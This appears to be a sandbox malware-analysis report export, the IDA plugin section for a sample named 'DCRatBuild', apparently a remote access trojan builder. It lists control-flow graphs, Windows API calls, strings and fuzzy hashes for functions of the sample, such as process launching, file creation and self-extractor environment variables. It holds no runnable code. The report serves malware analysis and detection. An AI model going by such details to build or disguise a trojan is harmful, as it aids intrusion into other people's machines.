                                                                                                                        • Opcode ID: 215c38bf6120503d02b4312ae0064db21e199d0f6ee20312ec43b36232bab29e
                                                                                                                        • Instruction ID: 923b9fdff022c1f214716a8cdb09f01a5fd498bc4523b6b7516ab14212876df5
                                                                                                                        • Opcode Fuzzy Hash: 215c38bf6120503d02b4312ae0064db21e199d0f6ee20312ec43b36232bab29e
                                                                                                                        • Instruction Fuzzy Hash: A332D071900218EACF24EF69C842BEA7BA4FF15304F40416FF90597291EBB99D85CB58

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004AB579
                                                                                                                          • Part of subcall function 004AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB58A
                                                                                                                          • Part of subcall function 004AB568: IsDialogMessageW.USER32(00010422,?), ref: 004AB59E
                                                                                                                          • Part of subcall function 004AB568: TranslateMessage.USER32(?), ref: 004AB5AC
                                                                                                                          • Part of subcall function 004AB568: DispatchMessageW.USER32(?), ref: 004AB5B6
                                                                                                                        • GetDlgItem.USER32(00000068,004EFCB8), ref: 004AD4E8
                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,004AAF07,00000001,?,?,004AB7B9,004C506C,004EFCB8,004EFCB8,00001000,00000000,00000000), ref: 004AD510
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004AD51B
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,004C35F4), ref: 004AD529
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004AD53F
                                                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004AD559
                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004AD59D
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004AD5AB
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004AD5BA
                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004AD5E1
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,004C43F4), ref: 004AD5F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                        • String ID: \
                                                                                                                        • API String ID: 3569833718-2967466578
                                                                                                                        • Opcode ID: 2d4a7bf816796d574cfa028ca8fe40a52ff267dbec46f1795c47c09f855acb11
                                                                                                                        • Instruction ID: 202af352d673b31e2b61aa3e25ac58232c110c4c5475732d78d103c5b6b74fdb
                                                                                                                        • Opcode Fuzzy Hash: 2d4a7bf816796d574cfa028ca8fe40a52ff267dbec46f1795c47c09f855acb11
                                                                                                                        • Instruction Fuzzy Hash: 2031B071545342BFE301DF20AC4AFBB7FACEB96709F00452AF55196190EB648A14CB7E

                                                                                                                        Control-flow Graph (function at 004AD78F; the interactive graph, with its executed and not-executed basic blocks, is not reproduced in this text export)
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 004AD7AE
                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 004AD8DE
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004AD91D
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004AD959
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004AD97F
                                                                                                                        • ShowWindow.USER32(?,00000001), ref: 004AD9E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                        • String ID: .exe$.inf$PDu<J$hJ$rJ
                                                                                                                        • API String ID: 36480843-3000700308
                                                                                                                        • Opcode ID: 5f155dc98f3b5b54339d69a04cb956f4174203261f74a405299f60af2fd74b61
                                                                                                                        • Instruction ID: f378ea13d929cb979896cfec66f2dc8b08c8fbc831d31dce26bcfba07dcdbf4e
                                                                                                                        • Opcode Fuzzy Hash: 5f155dc98f3b5b54339d69a04cb956f4174203261f74a405299f60af2fd74b61
                                                                                                                        • Instruction Fuzzy Hash: 6D51B3B08043809EEB20AF259844BAB7BE8AF67744F04042FF5D2976A1D77CD944C75E

Control-flow Graph (edge list recovered from the rendered graph; node ranges are basic-block addresses, "A->B" is an edge from block A to block B)
control_flow_graph 913 4ba95b-4ba974 914 4ba98a-4ba98f 913->914 915 4ba976-4ba986 call 4bef4c 913->915 916 4ba99c-4ba9c0 MultiByteToWideChar 914->916 917 4ba991-4ba999 914->917 915->914 922 4ba988 915->922 920 4bab53-4bab66 call 4afbbc 916->920 921 4ba9c6-4ba9d2 916->921 917->916 923 4baa26 921->923 924 4ba9d4-4ba9e5 921->924 922->914 926 4baa28-4baa2a 923->926 927 4ba9e7-4ba9f6 call 4c2010 924->927 928 4baa04-4baa15 call 4b8e06 924->928 930 4bab48 926->930 931 4baa30-4baa43 MultiByteToWideChar 926->931 927->930 940 4ba9fc-4baa02 927->940 928->930 941 4baa1b 928->941 935 4bab4a-4bab51 call 4babc3 930->935 931->930 934 4baa49-4baa5b call 4baf6c 931->934 942 4baa60-4baa64 934->942 935->920 944 4baa21-4baa24 940->944 941->944 942->930 945 4baa6a-4baa71 942->945 944->926 946 4baaab-4baab7 945->946 947 4baa73-4baa78 945->947 949 4baab9-4baaca 946->949 950 4bab03 946->950 947->935 948 4baa7e-4baa80 947->948 948->930 951 4baa86-4baaa0 call 4baf6c 948->951 953 4baacc-4baadb call 4c2010 949->953 954 4baae5-4baaf6 call 4b8e06 949->954 952 4bab05-4bab07 950->952 951->935 968 4baaa6 951->968 958 4bab09-4bab22 call 4baf6c 952->958 959 4bab41-4bab47 call 4babc3 952->959 953->959 965 4baadd-4baae3 953->965 954->959 967 4baaf8 954->967 958->959 971 4bab24-4bab2b 958->971 959->930 970 4baafe-4bab01 965->970 967->970 968->930 970->952 972 4bab2d-4bab2e 971->972 973 4bab67-4bab6d 971->973 974 4bab2f-4bab3f WideCharToMultiByte 972->974 973->974 974->959 975 4bab6f-4bab76 call 4babc3 974->975 975->935
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004B5695,004B5695,?,?,?,004BABAC,00000001,00000001,2DE85006), ref: 004BA9B5
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004BABAC,00000001,00000001,2DE85006,?,?,?), ref: 004BAA3B
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004BAB35
                                                                                                                        • __freea.LIBCMT ref: 004BAB42
                                                                                                                          • Part of subcall function 004B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        • __freea.LIBCMT ref: 004BAB4B
                                                                                                                        • __freea.LIBCMT ref: 004BAB70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1414292761-0
                                                                                                                        • Opcode ID: 969bfbf2e7e80111229cf051f5627ddefdf1e9fdb1281f91482036dd89f88895
                                                                                                                        • Instruction ID: 00ea9fc6dca56e9202f63a35fa4d993d4716ff2ee0f2fd2f9c323221fa5b3edc
                                                                                                                        • Opcode Fuzzy Hash: 969bfbf2e7e80111229cf051f5627ddefdf1e9fdb1281f91482036dd89f88895
                                                                                                                        • Instruction Fuzzy Hash: C5510872600206AFDB258F65CC41EFBB7AADB44714F15462EFE14D6240DB38EC60C67A

Control-flow Graph (edge list recovered from the rendered graph; node ranges are basic-block addresses, "A->B" is an edge from block A to block B)
control_flow_graph 978 4b3b72-4b3b7c 979 4b3bee-4b3bf1 978->979 980 4b3b7e-4b3b8c 979->980 981 4b3bf3 979->981 982 4b3b8e-4b3b91 980->982 983 4b3b95-4b3bb1 LoadLibraryExW 980->983 984 4b3bf5-4b3bf9 981->984 985 4b3c09-4b3c0b 982->985 986 4b3b93 982->986 987 4b3bfa-4b3c00 983->987 988 4b3bb3-4b3bbc GetLastError 983->988 985->984 989 4b3beb 986->989 987->985 992 4b3c02-4b3c03 FreeLibrary 987->992 990 4b3bbe-4b3bd3 call 4b6088 988->990 991 4b3be6-4b3be9 988->991 989->979 990->991 995 4b3bd5-4b3be4 LoadLibraryExW 990->995 991->989 992->985 995->987 995->991
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004B3C35,?,?,004F2088,00000000,?,004B3D60,00000004,InitializeCriticalSectionEx,004C6394,InitializeCriticalSectionEx,00000000), ref: 004B3C03
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                                        • Opcode ID: 099a00acc9449620f6b566cc2645047b56438d5276786857926691cd9c4704be
                                                                                                                        • Instruction ID: 9f950c8c8e527d2314eb7b9b3d71c8a88bf21eece3bf379bfa0abd1038168d57
                                                                                                                        • Opcode Fuzzy Hash: 099a00acc9449620f6b566cc2645047b56438d5276786857926691cd9c4704be
                                                                                                                        • Instruction Fuzzy Hash: 1611E732A08220ABCB218F6A9C41BDA37649F01772F210562F915EB295D778FF0086ED

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004A0836
                                                                                                                          • Part of subcall function 004A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0049F2D8,Crypt32.dll,00000000,0049F35C,?,?,0049F33E,?,?,?), ref: 004A0858
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004AAC2F
                                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004AAC66
                                                                                                                        • SHGetMalloc.SHELL32(004D8438), ref: 004AAC70
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                        • String ID: riched20.dll$3Ro
                                                                                                                        • API String ID: 3498096277-3613677438
                                                                                                                        • Opcode ID: b0f668680cb77989fa8aac49c97627c152a4c10412598ac0091738fa04f00fa0
                                                                                                                        • Instruction ID: b69235b2238821d5aa98d946224c5e77cf78834eb86e25da4842a9e64e2789c2
                                                                                                                        • Opcode Fuzzy Hash: b0f668680cb77989fa8aac49c97627c152a4c10412598ac0091738fa04f00fa0
                                                                                                                        • Instruction Fuzzy Hash: E5F04471900109ABCB50AFA6D9499EFFBFCEF94705F00401BA415E2201DB785605CBA4

Control-flow Graph (edge list recovered from the rendered graph; node ranges are basic-block addresses, "A->B" is an edge from block A to block B)
control_flow_graph 1000 4998e0-499901 call 4aec50 1003 49990c 1000->1003 1004 499903-499906 1000->1004 1006 49990e-49991f 1003->1006 1004->1003 1005 499908-49990a 1004->1005 1005->1006 1007 499921 1006->1007 1008 499927-499931 1006->1008 1007->1008 1009 499933 1008->1009 1010 499936-499943 call 496edb 1008->1010 1009->1010 1013 49994b-49996a CreateFileW 1010->1013 1014 499945 1010->1014 1015 4999bb-4999bf 1013->1015 1016 49996c-49998e GetLastError call 49bb03 1013->1016 1014->1013 1017 4999c3-4999c6 1015->1017 1021 4999c8-4999cd 1016->1021 1022 499990-4999b3 CreateFileW GetLastError 1016->1022 1020 4999d9-4999de 1017->1020 1017->1021 1024 4999ff-499a10 1020->1024 1025 4999e0-4999e3 1020->1025 1021->1020 1023 4999cf 1021->1023 1022->1017 1026 4999b5-4999b9 1022->1026 1023->1020 1028 499a2e-499a39 1024->1028 1029 499a12-499a2a call 4a0602 1024->1029 1025->1024 1027 4999e5-4999f9 SetFileTime 1025->1027 1026->1017 1027->1024 1029->1028
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00497760,?,00000005,?,00000011), ref: 0049995F
                                                                                                                        • GetLastError.KERNEL32(?,?,00497760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0049996C
                                                                                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00497760,?,00000005,?), ref: 004999A2
                                                                                                                        • GetLastError.KERNEL32(?,?,00497760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004999AA
                                                                                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00497760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004999F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateErrorLast$Time
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1999340476-0
                                                                                                                        • Opcode ID: da2c521dae5c654b574e9496bf367fb427906e2af6ed85a4ae321ff26186ee0c
                                                                                                                        • Instruction ID: a610cb5c5c7f23f87fc5353dd572340ca7006491d3698980d70235e2454c5ff1
                                                                                                                        • Opcode Fuzzy Hash: da2c521dae5c654b574e9496bf367fb427906e2af6ed85a4ae321ff26186ee0c
                                                                                                                        • Instruction Fuzzy Hash: 863125B15443416FEB209F29CC46BDABF94BB05324F100B2EF5A1963D0D3A9AD44CB99

Control-flow Graph (edge list recovered from the rendered graph; node ranges are basic-block addresses, "A->B" is an edge from block A to block B)
control_flow_graph 1059 4ab568-4ab581 PeekMessageW 1060 4ab5bc-4ab5be 1059->1060 1061 4ab583-4ab597 GetMessageW 1059->1061 1062 4ab5a8-4ab5b6 TranslateMessage DispatchMessageW 1061->1062 1063 4ab599-4ab5a6 IsDialogMessageW 1061->1063 1062->1060 1063->1060 1063->1062
                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004AB579
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB58A
                                                                                                                        • IsDialogMessageW.USER32(00010422,?), ref: 004AB59E
                                                                                                                        • TranslateMessage.USER32(?), ref: 004AB5AC
                                                                                                                        • DispatchMessageW.USER32(?), ref: 004AB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1266772231-0
                                                                                                                        • Opcode ID: cefdf04baddd1d5d08072902207d4115782c05a6c1177c734d282aaf6d3eb0cb
                                                                                                                        • Instruction ID: ba9a2c675f4cd3e34f89d526a034949ef1b0824e75b60f21e3bdb4e231158d81
                                                                                                                        • Opcode Fuzzy Hash: cefdf04baddd1d5d08072902207d4115782c05a6c1177c734d282aaf6d3eb0cb
                                                                                                                        • Instruction Fuzzy Hash: 99F0A971E0111ABACB209FA69C4CDEB7FACEE162957404426B505D2115EF28E615CBB8

Control-flow Graph (edge list recovered from the rendered graph; node ranges are basic-block addresses, "A->B" is an edge from block A to block B)
control_flow_graph 1064 4aabab-4aabca GetClassNameW 1065 4aabcc-4aabe1 call 4a1fbb 1064->1065 1066 4aabf2-4aabf4 1064->1066 1071 4aabe3-4aabef FindWindowExW 1065->1071 1072 4aabf1 1065->1072 1067 4aabff-4aac01 1066->1067 1068 4aabf6-4aabf9 SHAutoComplete 1066->1068 1068->1067 1071->1072 1072->1066
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 004AABC2
                                                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 004AABF9
                                                                                                                          • Part of subcall function 004A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0049C116,00000000,.exe,?,?,00000800,?,?,?,004A8E3C), ref: 004A1FD1
                                                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 004AABE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                        • String ID: EDIT
                                                                                                                        • API String ID: 4243998846-3080729518
                                                                                                                        • Opcode ID: e42ad45ddeaa4d396691635f81142db0017f153b0c3656cff8f459eb6b344443
                                                                                                                        • Instruction ID: bc420bac1e59d70af2881312b1f36e0da7adcb3f2281c0ac0691cbaa5e80990f
                                                                                                                        • Opcode Fuzzy Hash: e42ad45ddeaa4d396691635f81142db0017f153b0c3656cff8f459eb6b344443
                                                                                                                        • Instruction Fuzzy Hash: C6F082326012287ADB205B259C09FAF766C9B57B41F484027BA05A22C4DB68EA91C5BE

                                                                                                                         Control-flow Graph (rendered as an image in the original report; legend: Executed / Not Executed). Basic blocks and edges recovered from the graph data:
                                                                                                                         • 1073: 4adbde-4adc09, call 4aec50, SetEnvironmentVariableW, call 4a0371 -> 1077
                                                                                                                         • 1077: 4adc0e-4adc12 -> 1078 | 1079
                                                                                                                         • 1078: 4adc36-4adc38 (no successors)
                                                                                                                         • 1079: 4adc14-4adc18 -> 1080
                                                                                                                         • 1080: 4adc21-4adc28, call 4a048d -> 1083 | 1084
                                                                                                                         • 1083: 4adc1a-4adc20 -> 1080 (back edge)
                                                                                                                         • 1084: 4adc2a-4adc30, SetEnvironmentVariableW -> 1078
                                                                                                                        APIs
                                                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ADBF4
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ADC30
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                        • String ID: sfxcmd$sfxpar
                                                                                                                        • API String ID: 1431749950-3493335439
                                                                                                                        • Opcode ID: 4b8249a773254779a16d64e129a6ddd6312a8bf3fb4f45ecb13bbf594436d8b8
                                                                                                                        • Instruction ID: abdf7b3c81e34f55a7b731abea13fcd82dc286e76ce4dd7f5a50ca60497d4b8d
                                                                                                                        • Opcode Fuzzy Hash: 4b8249a773254779a16d64e129a6ddd6312a8bf3fb4f45ecb13bbf594436d8b8
                                                                                                                        • Instruction Fuzzy Hash: 4FF0E4B18052247FCB201F968C05FFB7758EF257557440417BD4595151DAB89D40D6BC

                                                                                                                         Control-flow Graph (rendered as an image in the original report; legend: Executed / Not Executed). Basic blocks and edges recovered from the graph data:
                                                                                                                         • 1085: 499785-499791 -> 1086 | 1087
                                                                                                                         • 1086: 49979e-4997b5, ReadFile -> 1088 | 1089
                                                                                                                         • 1087: 499793-49979b, GetStdHandle -> 1086
                                                                                                                         • 1088: 499811 -> 1090
                                                                                                                         • 1089: 4997b7-4997c0, call 4998bc -> 1093 | 1094
                                                                                                                         • 1090: 499814-499817 (no successors)
                                                                                                                         • 1093: 4997d9-4997dd -> 1095 | 1096
                                                                                                                         • 1094: 4997c2-4997ca -> 1093 | 1097
                                                                                                                         • 1095: 4997df-4997e8, GetLastError -> 1096 | 1098
                                                                                                                         • 1096: 4997ee-4997f2 -> 1099 | 1100
                                                                                                                         • 1097: 4997cc -> 1101
                                                                                                                         • 1098: 4997ea-4997ec -> 1090
                                                                                                                         • 1099: 49980c-49980f -> 1090
                                                                                                                         • 1100: 4997f4-4997fc -> 1099 | 1102
                                                                                                                         • 1101: 4997cd-4997d7, call 499785 (re-enters this function, whose first block starts at 499785) -> 1090
                                                                                                                         • 1102: 4997fe-499807, GetLastError -> 1099 | 1104
                                                                                                                         • 1104: 499809-49980a -> 1101
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00499795
                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004997AD
                                                                                                                        • GetLastError.KERNEL32 ref: 004997DF
                                                                                                                        • GetLastError.KERNEL32 ref: 004997FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                         • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                         • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2244327787-0
                                                                                                                        • Opcode ID: bf9aa5eda6cc3ea7b24ae77fe159a18a1260a121eac763c79a2923cf0c7f2786
                                                                                                                        • Instruction ID: 4fb73f071db08631a37a039adf4bd1e926c063bdb56781b9046b109b1e11402e
                                                                                                                        • Opcode Fuzzy Hash: bf9aa5eda6cc3ea7b24ae77fe159a18a1260a121eac763c79a2923cf0c7f2786
                                                                                                                        • Instruction Fuzzy Hash: A211C631520204EBCF30AFADC804AAA3FA8FB06325F10853FF41685290DB798E44DB69
                                                                                                                        APIs
